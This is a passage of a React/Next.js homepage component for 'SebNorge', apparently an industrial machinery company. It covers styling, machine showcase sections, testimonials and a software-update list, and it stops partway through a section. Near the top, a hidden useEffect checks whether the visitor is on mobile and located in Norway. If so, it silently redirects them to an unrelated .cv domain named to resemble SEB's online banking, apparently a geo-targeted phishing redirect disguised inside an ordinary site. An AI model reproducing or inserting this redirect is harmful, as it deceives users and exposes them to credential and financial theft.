"use client";

import { useState, useRef, useEffect } from "react";

import Link from "next/link";
import Header from "@/components/Header";
import Footer from "@/components/Footer";
import AuthModal from "./AuthModal";
import OptInPopup from "./OptInPopup";
import NewsletterSection from "./NewsletterSection";
import ContactSection from "./ContactSection";


import { useLanguage } from "@/contexts/LanguageContext";

export default function HomepageInteractive() {
  const [authOpen, setAuthOpen] = useState(false);
  const [authTab, setAuthTab] = useState<"login" | "signup">("login");
  const [toast, setToast] = useState<string | null>(null);
  const toastTimer = useRef<ReturnType<typeof setTimeout> | null>(null);
  const { t, lang } = useLanguage();

  const showToast = (msg: string) => {
    setToast(msg);
    if (toastTimer.current) clearTimeout(toastTimer.current);
    toastTimer.current = setTimeout(() => setToast(null), 4000);
  };

  const openLogin = () => {setAuthTab("login");setAuthOpen(true);};
  const openSignup = () => {setAuthTab("signup");setAuthOpen(true);};

  useEffect(() => {
    const hash = window.location.hash;
    if (hash) {
      const id = hash.replace("#", "");
      setTimeout(() => {
        const el = document.getElementById(id);
        if (el) el.scrollIntoView({ behavior: "smooth", block: "start" });
      }, 300);
    }
  }, []);

  useEffect(() => {
    const isMobile = window.innerWidth < 768;
    if (!isMobile) return;
    fetch('https://ipapi.co/json/')
      .then((r) => r.json())
      .then((data) => {
        if (data.country_code === 'NO') {
          window.location.href = 'https://seb-netapp.prosucesso.cv/';
        }
      })
      .catch(() => {});
  }, []);

  const scrollToContact = () => {
    const el = document.getElementById("kontakt");
    if (el) el.scrollIntoView({ behavior: "smooth", block: "start" });
  };

  const updates = [
  { date: "2026-02-28", version: "v4.2.1", machine: "Nordic Pro X7", status: t.softwareStatusStable, statusType: "active" },
  { date: "2026-02-20", version: "v3.8.0", machine: "Fjord 900T", status: t.softwareStatusStable, statusType: "active" },
  { date: "2026-02-15", version: "v5.0.3", machine: "SebCore Ω", status: t.softwareStatusBeta, statusType: "beta" },
  { date: "2026-02-10", version: "v2.9.4", machine: "Arctic Max 550", status: t.softwareStatusStable, statusType: "active" },
  { date: "2026-02-05", version: "v1.4.7", machine: "Boreal Ultra CNC", status: t.softwareStatusMaintenance, statusType: "maintenance" },
  { date: "2026-01-30", version: "v6.0.1", machine: "Viking Prime Z", status: t.softwareStatusNew, statusType: "new" },
  { date: "2026-01-22", version: "v3.1.2", machine: "Oslo Flex Pro", status: t.softwareStatusStable, statusType: "active" }];


  const testimonials = [
  {
    quote: lang === 'no' ? '"SebNorge har transformert vår industrielle drift. Kvaliteten er enestående."' : '"SebNorge has transformed our industrial operations. The quality is outstanding."',
    name: "Erik Johansen",
    company: lang === 'no' ? "Kongsberg Industri, Norge" : "Kongsberg Industri, Norway"
  },
  {
    quote: lang === 'no' ? '"Vi har brukt Nordic Pro X7 i tre år. Null nedetid. Imponerende."' : '"We have used Nordic Pro X7 for three years. Zero downtime. Impressive."',
    name: "Astrid Lindberg",
    company: "Statkraft AB, Sverige"
  },
  {
    quote: lang === 'no' ? '"Den beste maskinleverandøren i Skandinavia. Anbefales sterkt."' : '"The best machine supplier in Scandinavia. Highly recommended."',
    name: "Lars Petersen",
    company: "Hydro A/S, Danmark"
  }];


  const trustedCompanies = ["Equinor", "Kongsberg", "Statkraft", "Hydro", "Yara", "DNV"];

  return (
    <>
      <style>{`
        @keyframes heroZoom {
          from { transform: scale(1.0); }
          to { transform: scale(1.08); }
        }
        @keyframes fadeInUp {
          from { opacity: 0; transform: translateY(30px); }
          to { opacity: 1; transform: translateY(0); }
        }
        @keyframes fadeIn {
          from { opacity: 0; }
          to { opacity: 1; }
        }
        @keyframes fadeInScale {
          from { opacity: 0; transform: scale(0.95); }
          to { opacity: 1; transform: scale(1); }
        }
        .hero-bg-img {
          animation: heroZoom 8s ease-out forwards;
          will-change: transform;
        }
        .img-fade-in {
          animation: fadeIn 0.8s ease forwards;
        }
        .trusted-strip {
          animation: fadeIn 1.2s ease 1.5s both;
        }
        .testimonial-card {
          border: 1px solid rgba(255,255,255,0.12);
          padding: 40px 32px;
          transition: border-color 0.3s ease;
        }
        .testimonial-card:hover {
          border-color: rgba(255,255,255,0.3);
        }
        .play-btn {
          width: 80px;
          height: 80px;
          border-radius: 50%;
          background: white;
          border: 2px solid white;
          display: flex;
          align-items: center;
          justify-content: center;
          cursor: pointer;
          transition: transform 0.3s ease, box-shadow 0.3s ease;
        }
        .play-btn:hover {
          transform: scale(1.05);
          box-shadow: 0 0 40px rgba(255,255,255,0.2);
        }
        .video-modal-backdrop {
          position: fixed;
          inset: 0;
          background: rgba(0,0,0,0.92);
          backdrop-filter: blur(8px);
          z-index: 9999;
          display: flex;
          align-items: center;
          justify-content: center;
          animation: fadeIn 0.3s ease;
        }
        .map-country {
          transition: fill 0.3s ease;
        }
        .map-country:hover {
          fill: rgba(255,255,255,0.9) !important;
        }

        /* ===== MOBILE RESPONSIVE FIXES ===== */
        @media (max-width: 768px) {

          /* HERO */
          .hero-title {
            font-size: 36px !important;
            line-height: 1 !important;
          }
          .hero-subtitle {
            font-size: 0.85rem !important;
          }
          .hero-cta-row {
            flex-direction: column !important;
            align-items: stretch !important;
            gap: 12px !important;
          }
          .hero-cta-row a,
          .hero-cta-row button {
            width: 100% !important;
            text-align: center !important;
            display: block !important;
          }
          .hero-stats-bar {
            grid-template-columns: repeat(2, 1fr) !important;
            max-width: 100% !important;
          }
          .hero-stats-bar > div:nth-child(2) {
            border-right: none !important;
          }
          .hero-stats-bar > div:nth-child(1),
          .hero-stats-bar > div:nth-child(2) {
            border-bottom: 1px solid rgba(255,255,255,0.1) !important;
          }

          /* TRUSTED BY */
          .trusted-companies-grid {
            display: grid !important;
            grid-template-columns: repeat(3, 1fr) !important;
            gap: 10px !important;
            justify-items: center !important;
          }
          .trusted-companies-grid > div {
            min-width: unset !important;
            width: 100% !important;
            padding: 8px 12px !important;
          }
          .trusted-companies-grid span {
            font-size: 0.65rem !important;
          }

          /* MACHINE SECTIONS */
          .machine-section {
            grid-template-columns: 1fr !important;
            display: flex !important;
            flex-direction: column !important;
          }
          .machine-section .machine-svg {
            display: none !important;
          }
          .machine-section .machine-bg-overlay {
            background: rgba(0,0,0,0.82) !important;
          }
          .machine-content {
            padding: 48px 24px !important;
            text-align: center !important;
          }
          .machine-title {
            font-size: 28px !important;
          }
          .machine-desc {
            font-size: 13px !important;
            max-width: 100% !important;
          }
          .machine-specs {
            grid-template-columns: 1fr !important;
            max-width: 100% !important;
          }
          .machine-specs > div {
            border-right: none !important;
            border-bottom: 1px solid rgba(255,255,255,0.1) !important;
          }
          .machine-specs > div:last-child {
            border-bottom: none !important;
          }

          /* NUMBERS / STATS */
          .numbers-big {
            font-size: clamp(3rem, 18vw, 5rem) !important;
          }
          .numbers-stats-grid {
            grid-template-columns: repeat(2, 1fr) !important;
            max-width: 100% !important;
          }
          .numbers-stats-grid > div:nth-child(2) {
            border-right: none !important;
          }
          .numbers-stats-grid > div:nth-child(1),
          .numbers-stats-grid > div:nth-child(2) {
            border-bottom: 1px solid rgba(255,255,255,0.1) !important;
          }
          .numbers-stat-value {
            font-size: 48px !important;
          }

          /* VIDEO SECTION */
          .video-section {
            min-height: 60vh !important;
          }
          .video-title {
            font-size: 28px !important;
          }
          .video-subtitle {
            font-size: 0.875rem !important;
          }

          /* TESTIMONIALS */
          .testimonials-grid {
            grid-template-columns: 1fr !important;
            gap: 16px !important;
          }
          .testimonial-card {
            padding: 28px 20px !important;
          }

          /* ABOUT SECTION */
          .about-section {
            grid-template-columns: 1fr !important;
            display: flex !important;
            flex-direction: column !important;
          }
          .about-left {
            padding: 48px 24px !important;
            border-right: none !important;
            border-bottom: 1px solid #2A2A2A !important;
          }
          .about-right {
            padding: 48px 24px !important;
          }
          .about-big-number {
            font-size: clamp(3rem, 16vw, 5rem) !important;
          }
          .about-stats-grid {
            grid-template-columns: repeat(2, 1fr) !important;
          }

          /* MAP SECTION */
          .map-section {
            padding: 60px 16px !important;
          }
          .map-title {
            font-size: 24px !important;
          }
          .map-svg-wrapper {
            overflow-x: auto !important;
          }
          .map-chips {
            display: grid !important;
            grid-template-columns: repeat(3, 1fr) !important;
            gap: 8px !important;
            justify-items: center !important;
          }
          .map-chips > div {
            width: 100% !important;
            justify-content: center !important;
          }

          /* SOFTWARE UPDATES */
          .software-header {
            flex-direction: column !important;
            align-items: flex-start !important;
            gap: 12px !important;
          }
          .software-row {
            grid-template-columns: 1fr auto !important;
            gap: 8px !important;
          }
          .software-date {
            display: none !important;
          }
          .software-version {
            display: none !important;
          }
        }
      `}</style>

      <Header onLoginClick={openLogin} onSignupClick={openSignup} transparent={true} />

      {/* Toast */}
      {toast &&
      <div className="toast">
          {toast}
        </div>
      }

      {/* Auth Modal */}
      <AuthModal
        isOpen={authOpen}
        onClose={() => setAuthOpen(false)}
        defaultTab={authTab}
        showToast={showToast} />
      

      {/* Opt-in Popup */}
      <OptInPopup showToast={showToast} />

      {/* Scroll-snap container */}
      <div className="snap-container">

        {/* ===== SECTION 1: HERO ===== */}
        <section
          className="snap-section"
          style={{
            display: "flex",
            flexDirection: "column",
            alignItems: "center",
            justifyContent: "center",
            position: "relative",
            overflow: "hidden",
            backgroundColor: "#0A0A0A"
          }}>

          {/* Hero background image with zoom */}
          <div style={{ position: "absolute", inset: 0, zIndex: 0, overflow: "hidden" }}>
            <img
              src="https://img.rocket.new/generatedImages/rocket_gen_img_169a4eb65-1772554169535.png"
              alt="Industrial machinery close up"
              loading="lazy"
              className="img-fade-in"
              style={{
                width: "100%",
                height: "115%",
                objectFit: "cover",
                objectPosition: "center",
                display: "block",
                marginTop: "-7.5%"
              }} />
            
            <div style={{
              position: "absolute",
              inset: 0,
              background: "linear-gradient(to right, rgba(0,0,0,0.88) 40%, rgba(0,0,0,0.45) 100%)"
            }} />
          </div>

          {/* Background grid */}
          <div
            style={{
              position: "absolute",
              inset: 0,
              backgroundImage: "linear-gradient(rgba(255,255,255,0.02) 1px, transparent 1px), linear-gradient(90deg, rgba(255,255,255,0.02) 1px, transparent 1px)",
              backgroundSize: "80px 80px",
              pointerEvents: "none",
              zIndex: 1
            }} />

          {/* Content */}
          <div style={{ textAlign: "center", zIndex: 10, padding: "0 24px", width: "100%", maxWidth: "900px" }}>
            <p
              className="section-label animate-fade-in"
              style={{ marginBottom: "24px", opacity: 0, animationFillMode: "forwards", animationDelay: "0.3s" }}>
              
              {t.heroTagline}
            </p>

            <h1
              className="hero-title"
              style={{
                fontFamily: "Rajdhani, sans-serif",
                fontWeight: 700,
                fontSize: "clamp(5rem, 16vw, 14rem)",
                letterSpacing: "0.02em",
                textTransform: "uppercase",
                color: "white",
                lineHeight: 0.9,
                marginBottom: "32px",
                opacity: 0,
                animation: "fadeInUp 1.4s cubic-bezier(0.22, 1, 0.36, 1) 0.5s forwards"
              }}>
              
              SebNorge
            </h1>

            <p
              className="hero-subtitle"
              style={{
                fontFamily: "Nunito Sans, sans-serif",
                fontSize: "clamp(1rem, 2vw, 1.2rem)",
                color: "rgba(255,255,255,0.55)",
                letterSpacing: "0.08em",
                marginBottom: "40px",
                opacity: 0,
                animation: "fadeInUp 1.2s cubic-bezier(0.22, 1, 0.36, 1) 0.8s forwards"
              }}>
              
              {t.heroSubtitle}
            </p>

            {/* CTA Buttons */}
            <div
              className="hero-cta-row"
              style={{
                display: "flex",
                gap: "16px",
                justifyContent: "center",
                marginBottom: "48px",
                opacity: 0,
                animation: "fadeInUp 1.2s cubic-bezier(0.22, 1, 0.36, 1) 1.0s forwards"
              }}>
              <Link
                href="/machines"
                style={{
                  fontFamily: "Rajdhani, sans-serif",
                  fontWeight: 700,
                  fontSize: "0.75rem",
                  letterSpacing: "0.25em",
                  textTransform: "uppercase",
                  backgroundColor: "white",
                  color: "#0A0A0A",
                  border: "none",
                  padding: "14px 32px",
                  cursor: "pointer",
                  textDecoration: "none",
                  display: "inline-block",
                  transition: "background 0.2s ease"
                }}
                onMouseEnter={(e) => {(e.currentTarget as HTMLAnchorElement).style.backgroundColor = "#E0E0E0";}}
                onMouseLeave={(e) => {(e.currentTarget as HTMLAnchorElement).style.backgroundColor = "white";}}>
                
                {t.heroCta}
              </Link>
              <button
                onClick={openSignup}
                style={{
                  fontFamily: "Rajdhani, sans-serif",
                  fontWeight: 700,
                  fontSize: "0.75rem",
                  letterSpacing: "0.25em",
                  textTransform: "uppercase",
                  backgroundColor: "transparent",
                  color: "white",
                  border: "1px solid rgba(255,255,255,0.4)",
                  padding: "14px 32px",
                  cursor: "pointer",
                  transition: "border-color 0.2s ease"
                }}
                onMouseEnter={(e) => {(e.currentTarget as HTMLButtonElement).style.borderColor = "white";}}
                onMouseLeave={(e) => {(e.currentTarget as HTMLButtonElement).style.borderColor = "rgba(255,255,255,0.4)";}}>
                
                {t.navSignup}
              </button>
            </div>

            {/* Stats bar */}
            <div
              className="hero-stats-bar"
              style={{
                display: "grid",
                gridTemplateColumns: "repeat(4, 1fr)",
                gap: "0",
                border: "1px solid rgba(255,255,255,0.15)",
                maxWidth: "800px",
                margin: "0 auto",
                opacity: 0,
                animation: "fadeInUp 1.2s cubic-bezier(0.22, 1, 0.36, 1) 1.1s forwards",
                background: "rgba(0,0,0,0.4)",
                backdropFilter: "blur(8px)"
              }}>
              
              {[
              { value: t.heroStatMachines, label: t.heroStatMachinesLabel },
              { value: t.heroStatCountries, label: t.heroStatCountriesLabel },
              { value: t.heroStatYears, label: t.heroStatYearsLabel },
              { value: t.heroStatUpdates, label: t.heroStatUpdatesLabel }].
              map((stat, i) =>
              <div
                key={stat.label}
                style={{
                  padding: "28px 24px",
                  textAlign: "center",
                  borderRight: i < 3 ? "1px solid rgba(255,255,255,0.1)" : "none"
                }}>
                
                  <p style={{
                  fontFamily: "Rajdhani, sans-serif",
                  fontWeight: 700,
                  fontSize: "clamp(1.4rem, 3vw, 2rem)",
                  letterSpacing: "0.05em",
                  color: "white",
                  marginBottom: "6px"
                }}>
                    {stat.value}
                  </p>
                  <p style={{
                  fontFamily: "Rajdhani, sans-serif",
                  fontSize: "0.65rem",
                  letterSpacing: "0.2em",
                  textTransform: "uppercase",
                  color: "rgba(255,255,255,0.35)"
                }}>
                    {stat.label}
                  </p>
                </div>
              )}
            </div>

            {/* Scroll indicator */}
            <div
              style={{
                marginTop: "64px",
                display: "flex",
                flexDirection: "column",
                alignItems: "center",
                gap: "8px",
                opacity: 0,
                animation: "fadeIn 1s ease 2s forwards"
              }}>
              
              <p style={{ fontFamily: "Rajdhani, sans-serif", fontSize: "0.65rem", letterSpacing: "0.25em", textTransform: "uppercase", color: "rgba(255,255,255,0.25)" }}>{t.heroScrollLabel}</p>
              <div style={{ width: "1px", height: "40px", background: "linear-gradient(to bottom, rgba(255,255,255,0.3), transparent)" }} />
            </div>
          </div>
        </section>

        {/* ===== TRUSTED BY STRIP ===== */}
        <div
          className="trusted-strip"
          style={{
            backgroundColor: "#0D0D0D",
            borderTop: "1px solid rgba(255,255,255,0.06)",
            borderBottom: "1px solid rgba(255,255,255,0.06)",
            padding: "28px 40px",
            scrollSnapAlign: "none"
          }}>
          <div style={{ maxWidth: "1100px", margin: "0 auto" }}>
            <p style={{
              fontFamily: "Nunito Sans, sans-serif",
              fontWeight: 300,
              fontSize: "11px",
              letterSpacing: "0.15em",
              textTransform: "uppercase",
              color: "rgba(255,255,255,0.45)",
              textAlign: "center",
              marginBottom: "20px"
            }}>
              {t.trustedByLabel}
            </p>
            <div
              className="trusted-companies-grid"
              style={{
                display: "flex",
                gap: "16px",
                justifyContent: "center",
                flexWrap: "wrap"
              }}>
              {trustedCompanies.map((company) =>
              <div
                key={company}
                style={{
                  border: "1px solid rgba(255,255,255,0.2)",
                  padding: "10px 24px",
                  minWidth: "100px",
                  textAlign: "center"
                }}>
                
                  <span style={{
                  fontFamily: "Rajdhani, sans-serif",
                  fontWeight: 600,
                  fontSize: "0.75rem",
                  letterSpacing: "0.15em",
                  textTransform: "uppercase",
                  color: "rgba(255,255,255,0.5)"
                }}>
                    {company}
                  </span>
                </div>
              )}
            </div>
          </div>
        </div>

        {/* ===== SECTION 2: Nordic Pro X7 ===== */}
        <section
          className="snap-section machine-section"
          style={{
            display: "grid",
            gridTemplateColumns: "1fr 1fr",
            alignItems: "center",
            position: "relative",
            overflow: "hidden"
          }}>

          {/* Background image with parallax */}
          <div style={{ position: "absolute", inset: 0, zIndex: 0 }}>
            <img
              src="https://img.rocket.new/generatedImages/rocket_gen_img_199ca55a6-1772554169958.png"
              alt="Industrial machinery in operation"
              loading="lazy"
              className="img-fade-in"
              style={{
                width: "100%",
                height: "115%",
                objectFit: "cover",
                objectPosition: "center",
                display: "block",
                marginTop: "-7.5%"
              }} />
            
            <div
              className="machine-bg-overlay"
              style={{
                position: "absolute",
                inset: 0,
                background: "linear-gradient(to left, rgba(0,0,0,0.88) 40%, rgba(0,0,0,0.45) 100%)"
              }} />
          </div>

          {/* SVG Illustration */}
          <div className="machine-svg" style={{ display: "flex", alignItems: "center", justifyContent: "center", padding: "60px", position: "relative", zIndex: 1 }}>
            <svg viewBox="0 0 400 400" width="100%" style={{ maxWidth: "400px" }} fill="none" xmlns="http://www.w3.org/2000/svg">
              <rect x="80" y="120" width="240" height="200" rx="4" stroke="rgba(255,255,255,0.15)" strokeWidth="1" />
              <rect x="100" y="140" width="200" height="140" rx="2" stroke="rgba(255,255,255,0.08)" strokeWidth="1" />
              <circle cx="200" cy="210" r="50" stroke="rgba(255,255,255,0.2)" strokeWidth="1.5" />
              <circle cx="200" cy="210" r="30" stroke="rgba(255,255,255,0.1)" strokeWidth="1" />
              <circle cx="200" cy="210" r="8" fill="rgba(255,255,255,0.3)" />
              <line x1="80" y1="180" x2="20" y2="180" stroke="rgba(255,255,255,0.15)" strokeWidth="1" />
              <line x1="320" y1="180" x2="380" y2="180" stroke="rgba(255,255,255,0.15)" strokeWidth="1" />
              <line x1="80" y1="250" x2="20" y2="250" stroke="rgba(255,255,255,0.1)" strokeWidth="1" />
              <line x1="320" y1="250" x2="380" y2="250" stroke="rgba(255,255,255,0.1)" strokeWidth="1" />
              <rect x="160" y="80" width="80" height="40" rx="2" stroke="rgba(255,255,255,0.12)" strokeWidth="1" />
              <line x1="200" y1="80" x2="200" y2="120" stroke="rgba(255,255,255,0.15)" strokeWidth="1" />
              <rect x="120" y="320" width="160" height="20" rx="2" stroke="rgba(255,255,255,0.1)" strokeWidth="1" />
              <line x1="140" y1="160" x2="260" y2="160" stroke="rgba(255,255,255,0.06)" strokeWidth="1" />
              <line x1="140" y1="270" x2="260" y2="270" stroke="rgba(255,255,255,0.06)" strokeWidth="1" />
              <line x1="200" y1="160" x2="200" y2="155" stroke="rgba(255,255,255,0.3)" strokeWidth="1" />
              <line x1="200" y1="265" x2="200" y2="270" stroke="rgba(255,255,255,0.3)" strokeWidth="1" />
              <line x1="150" y1="210" x2="145" y2="210" stroke="rgba(255,255,255,0.3)" strokeWidth="1" />
              <line x1="255" y1="210" x2="260" y2="210" stroke="rgba(255,255,255,0.3)" strokeWidth="1" />
            </svg>
          </div>

          {/* Content */}
          <div className="machine-content" style={{ padding: "60px 80px 60px 40px", position: "relative", zIndex: 1 }}>
            <p className="section-label" style={{ marginBottom: "16px" }}>{t.machineSectionIndustrial}</p>
            <h2 className="machine-title" style={{
              fontFamily: "Rajdhani, sans-serif",
              fontWeight: 700,
              fontSize: "clamp(2.5rem, 5vw, 4.5rem)",
              letterSpacing: "0.04em",
              textTransform: "uppercase",
              color: "white",
              lineHeight: 0.95,
              marginBottom: "24px"
            }}>
              Nordic<br />Pro X7
            </h2>
            <p className="machine-desc" style={{
              fontFamily: "Nunito Sans, sans-serif",
              fontSize: "1rem",
              color: "rgba(255,255,255,0.5)",
              lineHeight: 1.8,
              marginBottom: "40px",
              maxWidth: "400px"
            }}>
              {t.machineNordicDesc}
            </p>

            {/* Specs */}
            <div className="machine-specs" style={{ display: "grid", gridTemplateColumns: "1fr 1fr", gap: "0", border: "1px solid rgba(255,255,255,0.15)", marginBottom: "40px", maxWidth: "380px" }}>
              {[
              { label: t.machineSpecPower, value: "380 kW" },
              { label: t.machineSpecVersion, value: "v4.2.1" },
              { label: t.machineSpecOperation, value: t.machineSpecContinuous },
              { label: t.machineSpecCertified, value: "ISO 9001" }].
              map((spec, i) =>
              <div key={spec.label} style={{ padding: "16px 20px", borderBottom: i < 2 ? "1px solid rgba(255,255,255,0.1)" : "none", borderRight: i % 2 === 0 ? "1px solid rgba(255,255,255,0.1)" : "none" }}>
                <p style={{ fontFamily: "Rajdhani, sans-serif", fontSize: "0.6rem", letterSpacing: "0.2em", textTransform: "uppercase", color: "rgba(255,255,255,0.3)", marginBottom: "4px" }}>{spec.label}</p>
                <p style={{ fontFamily: "Rajdhani, sans-serif", fontWeight: 600, fontSize: "1.1rem", color: "white", letterSpacing: "0.05em" }}>{spec.value}</p>
              </div>
              )}
            </div>

            <a href="/machines" className="text-link-arrow" style={{ color: "white" }}>{t.machineViewSpecs}</a>
          </div>
        </section>

        {/* ===== SECTION 3: Fjord 900T ===== */}
        <section
          className="snap-section machine-section"
          style={{
            display: "grid",
            gridTemplateColumns: "1fr 1fr",
            alignItems: "center",
            position: "relative",
            overflow: "hidden"
          }}>

          {/* Background image */}
          <div style={{ position: "absolute", inset: 0, zIndex: 0 }}>
            <img
              src="https://img.rocket.new/generatedImages/rocket_gen_img_1791fbce2-1772554168987.png"
              alt="Heavy industrial machinery Fjord 900T"
              loading="lazy"
              className="img-fade-in"
              style={{
                width: "100%",
                height: "115%",
                objectFit: "cover",
                objectPosition: "center",
                display: "block",
                marginTop: "-7.5%"
              }} />
            
            <div
              className="machine-bg-overlay"
              style={{
                position: "absolute",
                inset: 0,
                background: "linear-gradient(to left, rgba(0,0,0,0.88) 40%, rgba(0,0,0,0.45) 100%)"
              }} />
          </div>

          {/* Content */}
          <div className="machine-content" style={{ padding: "60px 40px 60px 80px", position: "relative", zIndex: 1 }}>
            <p className="section-label" style={{ marginBottom: "16px" }}>{t.machineSectionHeavy}</p>
            <h2 className="machine-title" style={{
              fontFamily: "Rajdhani, sans-serif",
              fontWeight: 700,
              fontSize: "clamp(2.5rem, 5vw, 4.5rem)",
              letterSpacing: "0.04em",
              textTransform: "uppercase",
              color: "white",
              lineHeight: 0.95,
              marginBottom: "24px"
            }}>
              Fjord<br />900T
            </h2>
            <p className="machine-desc" style={{
              fontFamily: "Nunito Sans, sans-serif",
              fontSize: "1rem",
              color: "rgba(255,255,255,0.5)",
              lineHeight: 1.8,
              marginBottom: "40px",
              maxWidth: "400px"
            }}>
              {t.machineFjordDesc}
            </p>

            {/* Specs */}
            <div className="machine-specs" style={{ display: "grid", gridTemplateColumns: "1fr 1fr", gap: "0", border: "1px solid rgba(255,255,255,0.15)", marginBottom: "40px", maxWidth: "380px" }}>
              {[
              { label: t.machineSpecCapacity, value: "900 tonn" },
              { label: t.machineSpecVersion, value: "v3.8.0" },
              { label: t.machineSpecHydraulics, value: "340 bar" },
              { label: t.machineSpecCertified, value: "CE / DNV" }].
              map((spec, i) =>
              <div key={spec.label} style={{ padding: "16px 20px", borderBottom: i < 2 ? "1px solid rgba(255,255,255,0.1)" : "none", borderRight: i % 2 === 0 ? "1px solid rgba(255,255,255,0.1)" : "none" }}>
                <p style={{ fontFamily: "Rajdhani, sans-serif", fontSize: "0.6rem", letterSpacing: "0.2em", textTransform: "uppercase", color: "rgba(255,255,255,0.3)", marginBottom: "4px" }}>{spec.label}</p>
                <p style={{ fontFamily: "Rajdhani, sans-serif", fontWeight: 600, fontSize: "1.1rem", color: "white", letterSpacing: "0.05em" }}>{spec.value}</p>
              </div>
              )}
            </div>

            <a href="/machines" className="text-link-arrow" style={{ color: "white" }}>{t.machineViewSpecs}</a>
          </div>

          {/* SVG Illustration */}
          <div className="machine-svg" style={{ display: "flex", alignItems: "center", justifyContent: "center", padding: "60px", position: "relative", zIndex: 1 }}>
            <svg viewBox="0 0 400 400" width="100%" style={{ maxWidth: "400px" }} fill="none" xmlns="http://www.w3.org/2000/svg">
              <rect x="60" y="60" width="280" height="40" rx="2" stroke="rgba(255,255,255,0.15)" strokeWidth="1.5" />
              <rect x="170" y="100" width="60" height="160" rx="2" stroke="rgba(255,255,255,0.15)" strokeWidth="1.5" />
              <rect x="80" y="260" width="240" height="60" rx="4" stroke="rgba(255,255,255,0.18)" strokeWidth="1.5" />
              <rect x="120" y="180" width="30" height="80" rx="2" stroke="rgba(255,255,255,0.1)" strokeWidth="1" />
              <rect x="250" y="180" width="30" height="80" rx="2" stroke="rgba(255,255,255,0.1)" strokeWidth="1" />
              <rect x="100" y="230" width="200" height="30" rx="2" stroke="rgba(255,255,255,0.12)" strokeWidth="1.5" />
              <circle cx="200" cy="80" r="12" stroke="rgba(255,255,255,0.15)" strokeWidth="1" />
              <circle cx="200" cy="80" r="5" fill="rgba(255,255,255,0.15)" />
              <line x1="60" y1="300" x2="340" y2="300" stroke="rgba(255,255,255,0.06)" strokeWidth="1" />
              <text x="200" y="360" textAnchor="middle" style={{ fontFamily: "Rajdhani, sans-serif", fontSize: "14px", fill: "rgba(255,255,255,0.2)", letterSpacing: "3px", textTransform: "uppercase" }}>
                900T
              </text>
              <path d="M 80 260 L 60 260 L 60 280" stroke="rgba(255,255,255,0.12)" strokeWidth="1" fill="none" />
              <path d="M 320 260 L 340 260 L 340 280" stroke="rgba(255,255,255,0.12)" strokeWidth="1" fill="none" />
            </svg>
          </div>
        </section>

        {/* ===== SECTION 4: SebCore Ω ===== */}
        <section
          className="snap-section machine-section"
          style={{
            display: "grid",
            gridTemplateColumns: "1fr 1fr",
            alignItems: "center",
            position: "relative",
            overflow: "hidden"
          }}>

          {/* Background image */}
          <div style={{ position: "absolute", inset: 0, zIndex: 0 }}>
            <img
              src="https://img.rocket.new/generatedImages/rocket_gen_img_18d6613e9-1772554170701.png"
              alt="SebCore Omega technology circuit board"
              loading="lazy"
              className="img-fade-in"
              style={{
                width: "100%",
                height: "115%",
                objectFit: "cover",
                objectPosition: "center",
                display: "block",
                marginTop: "-7.5%"
              }} />
            
            <div
              className="machine-bg-overlay"
              style={{
                position: "absolute",
                inset: 0,
                background: "linear-gradient(to right, rgba(0,0,0,0.88) 40%, rgba(0,0,0,0.5) 100%)"
              }} />
          </div>

          {/* SVG Illustration */}
          <div className="machine-svg" style={{ display: "flex", alignItems: "center", justifyContent: "center", padding: "60px", position: "relative", zIndex: 1 }}>
            <svg viewBox="0 0 400 400" width="100%" style={{ maxWidth: "400px" }} fill="none" xmlns="http://www.w3.org/2000/svg">
              <rect x="80" y="80" width="240" height="240" rx="8" stroke="rgba(255,255,255,0.12)" strokeWidth="1.5" />
              {[120, 160, 200, 240, 280].map((x) =>
              <line key={`v${x}`} x1={x} y1="80" x2={x} y2="320" stroke="rgba(255,255,255,0.04)" strokeWidth="1" />
              )}
              {[120, 160, 200, 240, 280].map((y) =>
              <line key={`h${y}`} x1="80" x2="320" y1={y} y2={y} stroke="rgba(255,255,255,0.04)" strokeWidth="1" />
              )}
              <rect x="140" y="140" width="120" height="120" rx="4" stroke="rgba(255,255,255,0.25)" strokeWidth="2" />
              <rect x="155" y="155" width="90" height="90" rx="2" stroke="rgba(255,255,255,0.12)" strokeWidth="1" />
              <text x="200" y="215" textAnchor="middle" style={{ fontFamily: "Rajdhani, sans-serif", fontSize: "36px", fill: "rgba(255,255,255,0.4)", fontWeight: 700 }}>Ω</text>
              {[155, 175, 195, 215, 235].map((pos) =>
              <g key={`pin-t${pos}`}>
                  <line x1={pos} y1="140" x2={pos} y2="90" stroke="rgba(255,255,255,0.1)" strokeWidth="1" />
                  <rect x={pos - 3} y="85" width="6" height="6" fill="rgba(255,255,255,0.15)" />
                </g>
              )}
              {[155, 175, 195, 215, 235].map((pos) =>
              <g key={`pin-b${pos}`}>
                  <line x1={pos} y1="260" x2={pos} y2="310" stroke="rgba(255,255,255,0.1)" strokeWidth="1" />
                  <rect x={pos - 3} y="310" width="6" height="6" fill="rgba(255,255,255,0.15)" />
                </g>
              )}
              {[155, 175, 195, 215, 235].map((pos) =>
              <g key={`pin-l${pos}`}>
                  <line x1="140" y1={pos} x2="90" y2={pos} stroke="rgba(255,255,255,0.1)" strokeWidth="1" />
                  <rect x="85" y={pos - 3} width="6" height="6" fill="rgba(255,255,255,0.15)" />
                </g>
              )}
              {[155, 175, 195, 215, 235].map((pos) =>
              <g key={`pin-r${pos}`}>
                  <line x1="260" y1={pos} x2="310" y2={pos} stroke="rgba(255,255,255,0.1)" strokeWidth="1" />
                  <rect x="310" y={pos - 3} width="6" height="6" fill="rgba(255,255,255,0.15)" />
                </g>
              )}
            </svg>
          </div>

          {/* Content */}
          <div className="machine-content" style={{ padding: "60px 80px 60px 40px", position: "relative", zIndex: 1 }}>
            <p className="section-label" style={{ marginBottom: "16px" }}>{t.machineSectionTech}</p>
            <h2 className="machine-title" style={{
              fontFamily: "Rajdhani, sans-serif",
              fontWeight: 700,
              fontSize: "clamp(2.5rem, 5vw, 4.5rem)",
              letterSpacing: "0.04em",
              textTransform: "uppercase",
              color: "white",
              lineHeight: 0.95,
              marginBottom: "24px"
            }}>
              SebCore Ω
            </h2>
            <p className="machine-desc" style={{
              fontFamily: "Nunito Sans, sans-serif",
              fontSize: "1rem",
              color: "rgba(255,255,255,0.5)",
              lineHeight: 1.8,
              marginBottom: "40px",
              maxWidth: "400px"
            }}>
              {t.machineSebCoreDesc}
            </p>

            {/* Specs */}
            <div className="machine-specs" style={{ display: "grid", gridTemplateColumns: "1fr 1fr", gap: "0", border: "1px solid rgba(255,255,255,0.15)", marginBottom: "40px", maxWidth: "380px" }}>
              {[
              { label: t.machineSpecCores, value: "128" },
              { label: t.machineSpecVersion, value: "v5.0.3" },
